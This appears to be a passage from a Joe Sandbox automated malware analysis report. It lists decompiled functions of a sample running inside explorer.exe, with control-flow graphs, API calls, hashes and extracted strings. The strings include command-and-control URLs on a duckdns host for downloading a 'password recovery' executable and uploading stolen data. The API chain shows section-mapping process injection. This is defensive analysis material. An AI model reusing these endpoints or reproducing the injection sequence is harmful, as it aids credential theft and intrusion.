17342->17276 17342->17343 17343->17340 17343->17341 17343->17342 18297 11b34e0 send

                          Executed Functions

                          Function 011A0740 Relevance: 145.7, APIs: 60, Strings: 23, Instructions: 432nativestringlibraryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 11a0740-11a079c call 11b20c0 3 11a07ab 0->3 4 11a079e-11a07a9 0->4 5 11a07b6-11a0823 CreateProcessW 3->5 4->5 6 11a1299 5->6 7 11a0829-11a08e6 GetModuleHandleW GetProcAddress * 5 GetCurrentProcess 5->7 10 11a129b-11a12a2 6->10 8 11a08ec-11a08f5 7->8 9 11a125d-11a1262 7->9 8->9 12 11a08fb-11a0904 8->12 9->6 11 11a1264-11a1290 TerminateProcess CloseHandle * 2 9->11 11->6 12->9 13 11a090a-11a0913 12->13 13->9 14 11a0919-11a0922 13->14 14->9 15 11a0928-11a09cc NtCreateSection 14->15 15->9 16 11a09d2-11a0a52 GetCurrentProcess NtMapViewOfSection 15->16 17 11a0a58-11a0ac8 NtMapViewOfSection 16->17 18 11a124f-11a1257 NtClose 16->18 19 11a1239-11a1249 NtUnmapViewOfSection 17->19 20 11a0ace-11a0b47 NtCreateSection 17->20 18->9 19->18 20->19 21 11a0b4d-11a0bd0 GetCurrentProcess NtMapViewOfSection 20->21 22 11a122b-11a1233 NtClose 21->22 23 11a0bd6-11a0c46 NtMapViewOfSection 21->23 22->19 24 11a0c4c-11a0e8b call 11b8c60 LoadLibraryW GetProcAddress * 2 lstrcpyW * 2 lstrcpyA * 9 NtCreateSection 23->24 25 11a1215-11a1225 NtUnmapViewOfSection 23->25 24->25 28 11a0e91-11a0f14 GetCurrentProcess NtMapViewOfSection 24->28 25->22 29 11a0f1a-11a0f8a NtMapViewOfSection 28->29 30 11a1207-11a120f NtClose 28->30 31 11a0f90-11a1010 call 11b8c60 CreateEventW 29->31 32 11a11f1-11a1201 NtUnmapViewOfSection 29->32 30->25 31->32 35 11a1016-11a1086 RtlCreateUserThread 31->35 32->30 36 11a108c-11a10e1 WaitForSingleObject 35->36 37 11a11e3-11a11eb CloseHandle 35->37 38 11a11a6-11a11db TerminateProcess CloseHandle * 2 36->38 39 11a10e7-11a119f NtUnmapViewOfSection * 6 NtClose * 3 CloseHandle 36->39 37->32 38->37 39->10
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Section$View$Close$lstrcpy$Unmap$AddressHandleProcProcess$Create$Current$Terminate$EventLibraryLoadModuleObjectSingleThreadUserWait
                          • String ID: @$@$CloseHandle$GetProcAddress$KERNEL32.DLL$KERNEL32.DLL$LoadLibraryA$LoadLibraryW$LocalAlloc$LocalFree$MessageBoxW$NTDLL.DLL$NtClose$NtCreateSection$NtMapViewOfSection$NtUnmapViewOfSection$RtlCreateUserThread$Sleep$USER32.DLL$VirtualAlloc$VirtualFree$VirtualProtect$h
                          • API String ID: 1065732154-2887914861
                          • Opcode ID: d22ddcdab2ec187a5051f8031a5281a0f50d3b2f8a6a42ef61a701425755e042
                          • Instruction ID: 57709f440208d6c4048e9c81c43c9bc77cdd70afe6bcee287b52ecd5518e5b1a
                          • Opcode Fuzzy Hash: d22ddcdab2ec187a5051f8031a5281a0f50d3b2f8a6a42ef61a701425755e042
                          • Instruction Fuzzy Hash: 95529E76208BC486E775DB15F4983DAB7A0F7C8798F50012ADA8A47B68DF7DC189CB40
                          Function 011B5E50 Relevance: 89.6, APIs: 48, Strings: 3, Instructions: 308synchronizationCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 264 11b5e50-11b5e7b OpenEventW 265 11b648e-11b6497 264->265 266 11b5e81-11b5e91 264->266 267 11b5eac-11b5eb3 266->267 268 11b5e93-11b5ea7 OpenMutexW 266->268 269 11b5ec1-11b5ed1 267->269 270 11b5eb5-11b5ebb 267->270 268->267 272 11b5ed3 269->272 273 11b5ed7-11b5ef6 OpenMutexW 269->273 270->269 271 11b6470-11b6476 270->271 274 11b6478-11b647d CloseHandle 271->274 275 11b6483-11b6488 CloseHandle 271->275 276 11b5f22-11b5f44 CreateEventW 272->276 273->271 277 11b5efc-11b5f12 WaitForSingleObject 273->277 274->275 275->265 279 11b5f4a-11b5f6d 276->279 280 11b6452-11b6458 276->280 277->276 278 11b5f14-11b5f1c 277->278 278->276 278->280 281 11b5fb9-11b5fc0 279->281 282 11b5f6f-11b5f77 279->282 280->271 283 11b645a-11b646a ReleaseMutex CloseHandle 280->283 285 11b63ce-11b63e0 WaitForSingleObject 281->285 286 11b5fc6-11b5fda WaitForSingleObject 281->286 284 11b5f83-11b5f8d 282->284 283->271 284->281 287 11b5f8f-11b5fab WaitForSingleObject 284->287 289 11b63fd-11b6403 285->289 290 11b63e2-11b63f7 SetEvent WaitForSingleObject 285->290 286->285 288 11b5fe0-11b5fe8 286->288 293 11b5fad 287->293 294 11b5fb7 287->294 295 11b5fea-11b5ffe WaitForSingleObject 288->295 296 11b6020-11b6053 SleepEx WaitForSingleObject 288->296 291 11b6419-11b641f 289->291 292 11b6405-11b6410 CloseHandle 289->292 290->289 297 11b6421-11b642c CloseHandle 291->297 298 11b6435 call 11b6f00 291->298 292->291 299 11b643a-11b6447 CloseHandle 293->299 294->281 300 11b5f79-11b5f7f 294->300 295->296 303 11b6000-11b6017 WaitForSingleObject 295->303 301 11b6066-11b606d 296->301 302 11b6055-11b6062 WaitForSingleObject 296->302 297->298 298->299 299->280 300->284 307 11b606f-11b6077 301->307 308 11b6082-11b608a 301->308 302->301 304 11b6019 303->304 305 11b601e 303->305 304->285 305->281 309 11b6079 307->309 310 11b607d 307->310 311 11b6090-11b6098 308->311 312 11b63b5 308->312 313 11b609e call 11b7060 309->313 314 11b63b7-11b63c9 WaitForSingleObject 310->314 311->312 311->313 312->285 312->314 316 11b60a3-11b60ae 313->316 314->281 317 11b6387-11b638e 316->317 318 11b60b4-11b60e1 setsockopt 316->318 321 11b63b3 317->321 322 11b6390-11b6397 317->322 319 11b6339-11b633f 318->319 320 11b60e7-11b6105 CreateEventW 318->320 323 11b635c-11b6385 CloseHandle call 11b20c0 319->323 324 11b6341-11b6356 shutdown closesocket 319->324 320->319 325 11b610b-11b612c LocalAlloc 320->325 321->314 322->321 326 11b6399-11b63a0 322->326 323->321 324->323 327 11b6132-11b6177 CreateThread 325->327 328 11b6325-11b6330 CloseHandle 325->328 326->321 330 11b63a2-11b63a9 326->330 332 11b617d-11b618d GetTickCount 327->332 333 11b630c-11b6315 327->333 328->319 330->321 331 11b63ab-11b63ad ExitProcess 330->331 331->321 336 11b6194-11b619b 332->336 333->328 335 11b6317-11b631f LocalFree 333->335 335->328 337 11b62a3-11b6303 shutdown closesocket SetEvent WaitForSingleObject call 11b6f00 call 11a3ae0 CloseHandle 336->337 338 11b61a1-11b61a9 336->338 337->333 339 11b61ab-11b61bf WaitForSingleObject 338->339 340 11b61c6-11b61da WaitForSingleObject 338->340 339->340 343 11b61c1 339->343 344 11b61dc 340->344 345 11b61e1-11b61f5 WaitForSingleObject 340->345 343->337 344->337 346 11b61fc-11b6226 call 11b34a0 345->346 347 11b61f7 345->347 352 11b622a-11b6232 346->352 353 11b6228 346->353 347->337 354 11b625b-11b6263 352->354 355 11b6234-11b623f WSAGetLastError 352->355 353->337 358 11b6293-11b629e Sleep 354->358 359 11b6265-11b626b GetTickCount 354->359 356 11b6259 355->356 357 11b6241-11b6253 GetTickCount 355->357 356->337 360 11b6257 357->360 361 11b6255 357->361 358->336 358->337 362 11b6272-11b628f call 11b34a0 359->362 360->354 361->337 362->358 365 11b6291 362->365 365->362
                          APIs
                          Strings
                          • {B4EFAA26-FFCE-43F3-A2CA-51585A1D8497}, xrefs: 011B5ED7
                          • {29C72B9F-C97F-4A3E-B2AD-47E00C9D4930}, xrefs: 011B5E5C
                          • {CCDA2DA7-D4F8-4F83-BFB6-45A8FDBB92EB}, xrefs: 011B5E93
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$EventMutexOpen$CreateObjectReleaseSingleWait
                          • String ID: {29C72B9F-C97F-4A3E-B2AD-47E00C9D4930}${B4EFAA26-FFCE-43F3-A2CA-51585A1D8497}${CCDA2DA7-D4F8-4F83-BFB6-45A8FDBB92EB}
                          • API String ID: 385723476-3335872644
                          • Opcode ID: a2d0ff3b073e106ed3e089b8a847fad09ce9971624778b037ba3c996cbbe071a
                          • Instruction ID: 2c3827eaaab6f433bba0666915ffa6cd0251f5869941a631bfbbd38712888a6a
                          • Opcode Fuzzy Hash: a2d0ff3b073e106ed3e089b8a847fad09ce9971624778b037ba3c996cbbe071a
                          • Instruction Fuzzy Hash: 3AF11C31508A40C6F76CAF55F8987DAB7A1F7D4759F105129E78A82AB8CF7CC48ACB01
                          Function 011953B0 Relevance: 63.3, APIs: 25, Strings: 11, Instructions: 310stringencryptionmemoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 366 11953b0-11953dc LocalAlloc 367 11953e8-1195593 lstrcpyW * 7 call 11a2160 366->367 368 11953de 366->368 374 1195599-1195616 CryptBinaryToStringW * 2 367->374 375 119568e-1195693 367->375 369 1195a06-1195a0e 368->369 372 1195a1d-1195a25 369->372 373 1195a10-1195a17 LocalFree 369->373 376 1195a34-1195a3a 372->376 377 1195a27-1195a2e LocalFree 372->377 373->372 374->375 378 1195618-1195686 call 11b84a8 lstrcpyW 374->378 379 119569f-11956ad call 11952c0 375->379 380 1195695 375->380 381 1195a3c-1195a41 CloseHandle 376->381 382 1195a47-1195a4d 376->382 377->376 378->375 389 11956b9-11956c6 LocalFree 379->389 390 11956af 379->390 380->369 381->382 385 1195a5a-1195a64 382->385 386 1195a4f-1195a54 CloseHandle 382->386 386->385 391 11956d1-11956d6 389->391 390->369 392 11957a8-11957b0 391->392 393 11956dc-1195752 call 11a9d20 391->393 395 11957bb-11957bd RtlExitUserThread 392->395 396 11957b2-11957b9 392->396 397 1195757-1195766 393->397 398 11957c3-11957c8 395->398 396->395 396->398 399 1195768-119576f 397->399 400 1195773-1195797 WaitForSingleObject 397->400 398->369 401 11957ce-1195839 call 11b92e0 call 11a2230 398->401 399->400 403 1195771 399->403 404 1195799 400->404 405 11957a3 400->405 409 119583b 401->409 410 1195845-11958d2 call 11b84a8 call 11a0740 401->410 403->392 404->369 405->391 409->369 415 11958de-1195931 WaitForMultipleObjects WaitForSingleObject 410->415 416 11958d4 410->416 417 119593d-1195952 GetExitCodeProcess 415->417 418 1195933 415->418 416->369 419 119595e-1195965 417->419 420 1195954 417->420 418->369 421 11959aa-11959d7 WaitForSingleObject 419->421 422 1195967-119596f 419->422 420->369 425 11959d9 421->425 426 11959db-11959e1 421->426 423 119597b-119599f WaitForSingleObject 422->423 424 1195971 422->424 427 11959a1 423->427 428 11959a5 423->428 424->369 425->369 429 11959ee-11959f4 426->429 430 11959e3-11959e8 CloseHandle 426->430 427->369 428->398 431 1195a01 429->431 432 11959f6-11959fb CloseHandle 429->432 430->429 431->369 431->398 432->431
                          APIs
                          Strings
                          • Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0, xrefs: 01195443, 011956FE
                          • {D83724BA-04CE-4C5A-92C0-4EFDCB8527B7}, xrefs: 01195426, 01195890
                          • http://jholo.duckdns.org:8181/PASSWORDRECOVERY64EXE.EXE, xrefs: 01195723
                          • http://jholo.duckdns.org:8181/upload.php, xrefs: 0119547D
                          • {77502BD7-F094-4214-B203-3420A1B5DA5A}, xrefs: 011953E8
                          • {2046C745-B848-47EE-8068-B039EAC15A1C}, xrefs: 01195863
                          • %s %s, xrefs: 01195877
                          • {80B01CD6-9400-4D04-9C3F-8E33F208D7F0}, xrefs: 0119549A
                          • {CCDA2DA7-D4F8-4F83-BFB6-45A8FDBB92EB}, xrefs: 01195409
                          • HWID_%s, xrefs: 0119564F
                          • 8DWH9, xrefs: 01195460
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Local$BinaryCloseCryptFreeHandleString$Alloc
                          • String ID: %s %s$8DWH9$HWID_%s$Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0$http://jholo.duckdns.org:8181/PASSWORDRECOVERY64EXE.EXE$http://jholo.duckdns.org:8181/upload.php${2046C745-B848-47EE-8068-B039EAC15A1C}${77502BD7-F094-4214-B203-3420A1B5DA5A}${80B01CD6-9400-4D04-9C3F-8E33F208D7F0}${CCDA2DA7-D4F8-4F83-BFB6-45A8FDBB92EB}${D83724BA-04CE-4C5A-92C0-4EFDCB8527B7}
                          • API String ID: 1616647813-2197411971
                          • Opcode ID: ed85ddc92422963fe84181da24f9d54ef7f1b7cb9a7efb9a38633701095274f8
                          • Instruction ID: 2afd4a396b246c48ce20dcbf3cacfaa361779d8dc76cedb8e2f1328b19006188
                          • Opcode Fuzzy Hash: ed85ddc92422963fe84181da24f9d54ef7f1b7cb9a7efb9a38633701095274f8
                          • Instruction Fuzzy Hash: A4020B35218B8486EB6DEB64F8943DA77A2F788758F40413AEA4D437A4DF7CC14ACB40
                          Function 011AD600 Relevance: 59.8, APIs: 28, Strings: 6, Instructions: 259librarymemorysynchronizationCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 502 11ad600-11ad658 OpenMutexW LoadLibraryW LocalAlloc 503 11ad65a 502->503 504 11ad664-11ad679 GetModuleFileNameW 502->504 505 11ada56-11ada5d 503->505 506 11ad67b 504->506 507 11ad685-11ad6a7 call 11b1f40 504->507 509 11ada5f-11ada67 505->509 510 11adaac-11adac7 call 1191860 call 1194140 call 1194560 call 1195290 call 11a7980 505->510 506->505 515 11ad6a9 507->515 516 11ad6ae-11ad6ea OpenMutexW 507->516 512 11ada69-11ada8f SetEvent WaitForSingleObject CloseHandle 509->512 513 11ada95-11ada9d 509->513 539 11adac9-11adacb ExitProcess 510->539 540 11adad1-11adade call 11b2610 510->540 512->513 513->510 517 11ada9f-11adaa6 CloseHandle 513->517 519 11adb4f-11adb56 515->519 520 11ad6ec 516->520 521 11ad6f6-11ad6fd call 11917c0 516->521 517->510 520->505 528 11ad709-11ad710 call 1194050 521->528 529 11ad6ff 521->529 535 11ad71c-11ad723 call 11a7910 528->535 536 11ad712 528->536 529->505 542 11ad72f-11ad736 call 11a3a60 535->542 543 11ad725 535->543 536->505 548 11adaed-11adaf3 540->548 549 11adae0-11adae7 CloseHandle 540->549 550 11ad738 542->550 551 11ad742-11ad749 call 11b2340 542->551 543->505 552 11adb00-11adb1c 548->552 553 11adaf5-11adafa CloseHandle 548->553 549->548 550->505 561 11ad74b 551->561 562 11ad755-11ad75c call 1195230 551->562 554 11adb2b-11adb31 552->554 555 11adb1e-11adb25 CloseHandle 552->555 553->552 557 11adb3e-11adb45 554->557 558 11adb33-11adb38 LocalFree 554->558 555->554 557->519 560 11adb47-11adb49 ExitProcess 557->560 558->557 561->505 565 11ad768-11ad76f call 11944b0 562->565 566 11ad75e 562->566 569 11ad77b-11ad794 call 1199c50 565->569 570 11ad771 565->570 566->505 573 11ad796-11ad7b5 CreateMutexExW 569->573 574 11ad7c4-11ad7e0 call 11ae3b0 call 1199d70 569->574 570->505 575 11ad7bc 573->575 576 11ad7b7 573->576 581 11ad7e2-11ad801 CreateMutexW 574->581 582 11ad810-11ad81c call 11ae3b0 574->582 575->574 576->519 584 11ad808 581->584 585 11ad803 581->585 587 11ad827 call 1199e90 582->587 584->582 585->519 588 11ad82c-11ad82f 587->588 589 11ad862-11ad875 call 11ae3b0 588->589 590 11ad831-11ad850 CreateMutexW 588->590 595 11ad87b-11ad882 589->595 596 11ad977-11ad97e 589->596 591 11ad852 590->591 592 11ad857 590->592 591->519 592->589 595->596 599 11ad888-11ad88d 595->599 597 11ad9d0-11ad9d7 596->597 598 11ad980-11ad9a2 CreateEventW 596->598 601 11ad9d9-11ad9eb WaitForSingleObject 597->601 602 11ad9ef-11ad9f6 597->602 598->597 600 11ad9a4-11ad9c9 CreateThread 598->600 603 11ad88f-11ad894 599->603 604 11ad8a0 599->604 600->597 601->505 605 11ad9f8-11ada03 602->605 606 11ada05 602->606 603->604 607 11ad896-11ad89e 603->607 608 11ad8ab-11ad8b3 604->608 611 11ada10-11ada50 WaitForMultipleObjects SetEvent 605->611 606->611 607->604 609 11ad8db-11ad8e2 607->609 608->609 610 11ad8b5 call 119fa60 608->610 609->596 613 11ad8e8-11ad90a call 1197770 609->613 614 11ad8ba-11ad8bc 610->614 611->505 613->596 618 11ad90c 613->618 614->609 616 11ad8be-11ad8d9 Sleep 614->616 616->608 619 11ad917-11ad928 GetFileAttributesW 618->619 620 11ad92a-11ad93a DeleteFileW 619->620 621 11ad969-11ad971 LocalFree 619->621 622 11ad93c-11ad954 620->622 623 11ad965 620->623 621->596 624 11ad958-11ad967 Sleep 622->624 625 11ad956 622->625 623->621 624->619 625->621
                          APIs
                          • OpenMutexW.KERNEL32 ref: 011AD615
                          • LoadLibraryW.KERNEL32 ref: 011AD629
                          • LocalAlloc.KERNEL32 ref: 011AD647
                          • GetModuleFileNameW.KERNEL32 ref: 011AD671
                          • SetEvent.KERNEL32 ref: 011ADA70
                          • WaitForSingleObject.KERNEL32 ref: 011ADA82
                          • CloseHandle.KERNEL32 ref: 011ADA8F
                          • CloseHandle.KERNEL32 ref: 011ADAA6
                          • ExitProcess.KERNEL32 ref: 011ADACB
                            • Part of subcall function 011B2610: SetEvent.KERNEL32 ref: 011B262F
                            • Part of subcall function 011B2610: WaitForSingleObject.KERNEL32 ref: 011B264B
                            • Part of subcall function 011B2610: CloseHandle.KERNEL32 ref: 011B2662
                            • Part of subcall function 011B2610: SetEvent.KERNEL32 ref: 011B2679
                            • Part of subcall function 011B2610: WaitForSingleObject.KERNEL32 ref: 011B2695
                            • Part of subcall function 011B2610: CloseHandle.KERNEL32 ref: 011B26AC
                            • Part of subcall function 011B2610: CloseHandle.KERNEL32 ref: 011B26C3
                            • Part of subcall function 011B2610: SetEvent.KERNEL32 ref: 011B26DA
                            • Part of subcall function 011B2610: WaitForSingleObject.KERNEL32 ref: 011B26F6
                            • Part of subcall function 011B2610: CloseHandle.KERNEL32 ref: 011B270D
                            • Part of subcall function 011B2610: SetEvent.KERNEL32 ref: 011B2724
                            • Part of subcall function 011B2610: WaitForSingleObject.KERNEL32 ref: 011B2740
                            • Part of subcall function 011B2610: CloseHandle.KERNEL32 ref: 011B2757
                            • Part of subcall function 011B2610: CloseHandle.KERNEL32 ref: 011B276E
                          • CloseHandle.KERNEL32 ref: 011ADAE7
                          • CloseHandle.KERNEL32 ref: 011ADAFA
                          • CloseHandle.KERNEL32 ref: 011ADB25
                          • LocalFree.KERNEL32 ref: 011ADB38
                          • ExitProcess.KERNEL32 ref: 011ADB49
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$EventObjectSingleWait$ExitLocalProcess$AllocFileFreeLibraryLoadModuleMutexNameOpen
                          • String ID: KERNEL32.DLL${1C8F1E61-D31A-4DE2-A46A-E1D82FC75222}${4002ADAA-2323-44A5-9F39-80B79D7023EC}${45B611DD-86ED-4560-AAC7-993511C63D52}${BBD69D41-7ECF-4B3B-8592-7E70DE12B303}${CCDA2DA7-D4F8-4F83-BFB6-45A8FDBB92EB}
                          • API String ID: 2953619224-2001950224
                          • Opcode ID: 7d4233aa22a0ef6a752a48a5c6b58013a9f72c86b8a6f913a1f9c80323a7af34
                          • Instruction ID: 7b7a688c6ef4ad0c43a4d31c1bb455fb1ee32b6a0fbae037610e8e6e5ca32020
                          • Opcode Fuzzy Hash: 7d4233aa22a0ef6a752a48a5c6b58013a9f72c86b8a6f913a1f9c80323a7af34
                          • Instruction Fuzzy Hash: 80D14F39108F84C6EF6CABA4F8543DA7BA1F780758F804129D79A46EA4DF7CC089CB41
                          Function 011A9D20 Relevance: 35.3, APIs: 17, Strings: 3, Instructions: 340COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 687 11a9d20-11a9dca call 11b93e0 call 11921c0 692 11a9dcc-11a9ded call 11ab3e0 687->692 693 11a9df2-11a9dfd 687->693 699 11aa4f4-11aa4fc 692->699 694 11a9e0f-11a9e1d 693->694 696 11a9e1f-11a9e44 694->696 697 11a9e46-11a9e4e 694->697 696->694 702 11a9e50-11a9e71 call 11ab3e0 697->702 703 11a9e76-11a9e91 LocalAlloc 697->703 702->699 705 11aa3ed-11aa3f2 703->705 706 11a9e97-11a9eb8 CreateEventW 703->706 707 11aa3f8-11aa430 call 11ab410 LocalAlloc 705->707 708 11aa4d3-11aa4ec call 11ab3e0 705->708 710 11a9ebe-11a9eec LocalAlloc 706->710 711 11aa3e2-11aa3e7 LocalFree 706->711 720 11aa458-11aa4d1 call 11ab410 call 11939a0 call 11b8c60 call 11ab410 call 11ab3e0 707->720 721 11aa432-11aa453 call 11ab3e0 707->721 708->699 714 11a9ef2-11a9f13 LocalAlloc 710->714 715 11aa3d4-11aa3dc CloseHandle 710->715 711->705 718 11a9f19-11a9f8d call 11b92e0 714->718 719 11aa3c6-11aa3ce LocalFree 714->719 715->711 730 11aa3b8-11aa3c0 LocalFree 718->730 731 11a9f93-11a9fc5 718->731 719->715 720->699 721->699 730->719 731->730 737 11a9fcb-11a9ffa 731->737 742 11aa3aa 737->742 743 11aa000-11aa05e 737->743 742->730 743->742 746 11aa064-11aa071 743->746 747 11aa073-11aa07e 746->747 748 11aa080 746->748 749 11aa08b-11aa0e8 747->749 748->749 751 11aa0ee-11aa101 749->751 752 11aa39c 749->752 753 11aa13e-11aa146 751->753 754 11aa103-11aa137 751->754 752->742 755 11aa148-11aa150 753->755 756 11aa164-11aa197 753->756 754->753 758 11aa38e 755->758 759 11aa156-11aa15e 755->759 756->758 761 11aa19d-11aa1cd WaitForMultipleObjects 756->761 758->752 759->756 759->758 761->758 762 11aa1d3-11aa1e6 761->762 762->758 764 11aa1ec-11aa21c WaitForMultipleObjects 762->764 764->758 765 11aa222-11aa263 764->765 767 11aa26a-11aa29a call 11b9510 765->767 768 11aa265 765->768 771 11aa29c 767->771 772 11aa2a1-11aa2bb 767->772 768->758 771->758 773 11aa2bd-11aa2c2 772->773 773->758 774 11aa2c8-11aa2d9 773->774 775 11aa2e7-11aa2e9 774->775 776 11aa2eb 775->776 777 11aa2f0-11aa320 WaitForMultipleObjects 775->777 776->758 778 11aa322 777->778 779 11aa324-11aa32d 777->779 778->758 780 11aa339-11aa389 call 1192260 call 11ab520 779->780 781 11aa32f-11aa337 779->781 780->773 781->758
                          APIs
                          • std::rethrow_exception.LIBCMTD ref: 011A9DE0
                          • std::rethrow_exception.LIBCMTD ref: 011A9E64
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::rethrow_exception
                          • String ID: */*$GET$h
                          • API String ID: 1317400359-3109941101
                          • Opcode ID: f129953d59edf0b601b504c3e7c4680672db90959bf7e53f46ffae57e779adc8
                          • Instruction ID: 6a0a7e852ded5dbfde3bfa200ce1c17344cde8507c1cba67420deb8a3b348aa9
                          • Opcode Fuzzy Hash: f129953d59edf0b601b504c3e7c4680672db90959bf7e53f46ffae57e779adc8
                          • Instruction Fuzzy Hash: CF02F376218AC486E779DB15F4943DEBBA0FB88784F904126DB8983B58DF7CC489CB40
                          Function 01191000 Relevance: 29.8, APIs: 14, Strings: 3, Instructions: 82COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 011A8830: LoadLibraryW.KERNEL32 ref: 011A8842
                          • ExitProcess.KERNEL32 ref: 0119104B
                          • GetModuleFileNameW.KERNEL32 ref: 01191076
                          • ExitProcess.KERNEL32 ref: 01191082
                          Strings
                          • {56B2BCE6-A24C-48AB-82DC-EE1FC9C9389D}, xrefs: 011910AF
                          • {29C72B9F-C97F-4A3E-B2AD-47E00C9D4930}, xrefs: 011910FB
                          • {80130DAC-3FD0-43E8-A3CA-91C0865C2735}, xrefs: 01191134
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
